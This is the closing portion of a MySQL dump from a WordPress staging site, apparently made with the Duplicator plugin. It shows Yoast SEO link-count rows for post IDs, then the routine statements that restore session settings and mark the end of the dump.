INSERT INTO `wpstg0_yoast_seo_meta` VALUES (1,0,0),(2,0,0),(8,0,0),(9,0,0),(10,0,0),(11,0,0),(14,0,0),(15,0,0),(16,0,0),(18,0,0),(20,0,0),(21,0,0),(26,0,0),(27,0,0),(29,0,0),(32,0,0),(33,0,0),(38,0,0),(39,0,0),(41,0,0),(44,0,0),(45,0,0),(47,0,0),(50,0,0),(51,0,0),(56,0,0),(58,0,0),(61,0,0),(62,0,0),(67,0,0),(68,0,0),(69,0,0),(70,0,0),(73,0,0),(74,0,0),(76,0,0),(79,0,0),(80,0,0),(85,0,0),(86,0,0),(88,0,0),(91,0,0),(92,0,0),(94,0,0),(97,0,0),(98,0,0),(99,0,0),(100,0,0),(103,0,0),(104,0,0),(106,0,0),(109,0,0),(110,0,0),(112,0,0),(115,0,0),(116,0,0),(118,0,0),(121,0,0),(122,0,0),(125,0,0),(127,0,0),(128,0,0),(130,0,0),(133,0,0),(134,0,0),(139,0,0),(140,0,0),(142,0,0),(145,0,0),(146,0,0),(147,0,0),(148,0,0),(151,0,0),(152,0,0),(157,0,0),(158,0,0),(159,0,0),(160,0,0),(163,0,0),(164,0,0),(166,0,0),(169,0,0),(170,0,0),(175,0,0),(176,0,0),(178,0,0),(181,0,0),(182,0,0),(184,0,0),(187,0,0),(188,0,0),(189,0,0),(190,0,0),(193,0,0),(195,0,0),(198,0,0),(199,0,0),(204,0,0),(205,0,0),(207,0,0),(210,0,0),(211,0,0),(213,0,0),(216,0,0),(217,0,0),(218,0,0),(219,0,0),(222,0,0),(223,0,0),(225,0,0),(228,0,0),(229,0,0),(231,0,0),(234,0,0),(235,0,0),(240,0,0),(241,0,0),(243,0,0),(246,0,0),(247,0,0),(249,0,0),(250,0,0),(252,0,0),(253,0,0),(255,0,0),(256,0,0),(258,0,0),(259,0,0),(266,0,0),(267,0,0),(269,0,0),(272,0,0),(273,0,0),(275,0,0),(278,0,0),(279,0,0),(281,0,0),(284,0,0),(286,0,0),(289,0,0),(290,0,0),(292,0,0),(295,0,0),(297,0,0),(300,0,0),(301,0,0),(303,0,0),(306,0,0),(307,0,0),(309,0,0),(312,0,0),(313,0,0),(329,0,0),(334,0,0),(337,0,0),(351,0,0),(358,0,0),(359,0,0),(360,0,0),(363,0,0),(364,0,0),(366,0,0),(367,0,0),(368,0,0),(369,0,0),(370,0,0),(372,0,0),(373,0,0),(374,0,0),(378,0,0),(380,0,0),(383,0,0),(385,0,0),(387,0,0),(394,0,0),(395,0,0),(396,0,0),(397,0,0),(398,0,0),(400,0,0),(401,0,0),(405,0,0),(406,0,0),(411,0,0),(412,0,0),(416,6,0),(417,0,0),(420,0,0),(421,0,0),(422,0,0),(423,0,0),(424,0,0),(425,0,0),(426,0,0),(427,0,0),(428,0,0),(431,0,0),(432,0,0),(443,0,0),(466,0,0),(468,0,0),(470,0,0),(524,0,0),(526,0,0),(538,0,0),(552,0,0),(573,0,0),(576,0,0),(577,0,0),(578,0,0),(579,0,0),(580,0,0),(581,0,0),(582,0,0),(583,0,0),(584,0,0),(585,0,0),(587,0,0),(588,0,0),(590,0,0),(603,0,0),(610,0,0),(612,0,0),(613,0,0),(615,0,0),(617,0,0),(619,0,0),(624,0,0),(625,0,0),(626,0,0),(632,0,0),(638,0,0),(639,0,0),(644,0,0),(661,0,0),(662,0,0),(664,0,0),(668,0,0),(669,0,0),(670,0,0),(675,0,0),(676,0,0),(677,0,0),(678,0,0),(681,0,0),(686,0,0),(687,0,0),(688,0,0),(689,0,0),(690,0,0),(691,0,0),(692,0,0),(693,0,0),(694,0,0),(695,0,0),(696,0,0),(697,0,0),(698,0,0),(699,0,0),(700,0,0),(701,0,0),(702,0,0),(703,0,0),(704,0,0),(705,0,0),(706,0,0),(707,0,0),(708,0,0),(709,0,0),(710,0,0),(711,0,0),(712,0,0),(713,0,0),(714,0,0),(715,0,0),(716,0,0),(717,0,0),(718,0,0),(719,0,0),(720,0,0),(721,0,0),(722,0,0),(723,0,0),(724,0,0),(725,0,0),(726,0,0),(727,0,0),(728,0,0),(729,0,0),(730,0,0),(731,0,0),(732,0,0),(733,0,0),(734,0,0),(735,0,0),(736,0,0),(737,0,0),(738,0,0),(739,0,0),(774,0,0),(782,0,0),(783,0,0),(793,0,0),(794,0,0),(795,0,0),(796,0,0),(797,0,0),(798,0,0),(799,0,0),(800,0,0),(801,0,0),(802,0,0),(803,0,0),(804,0,0),(805,0,0),(806,0,0),(807,0,0),(808,0,0),(809,0,0),(810,0,0),(811,0,0),(812,0,0),(813,0,0),(816,0,0),(817,0,0),(835,0,0),(839,0,0),(843,0,0),(846,0,0),(880,0,0),(881,0,0),(882,0,0),(883,0,0),(884,0,0),(885,0,0),(886,0,0),(887,0,0),(896,0,0),(897,1,0),(902,0,0),(903,0,0),(904,0,0),(905,0,0),(906,0,0),(907,0,0),(908,0,0),(909,0,0),(915,0,0),(916,0,0),(917,0,0),(921,0,0),(929,0,0),(930,0,0),(931,0,0),(937,0,0);
/*!40000 ALTER TABLE `wpstg0_yoast_seo_meta` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2017-12-08 10:40:40


/* Duplicator WordPress Timestamp: 2017-12-08 09:40:40*/
/* DUPLICATOR_MYSQLDUMP_EOF */
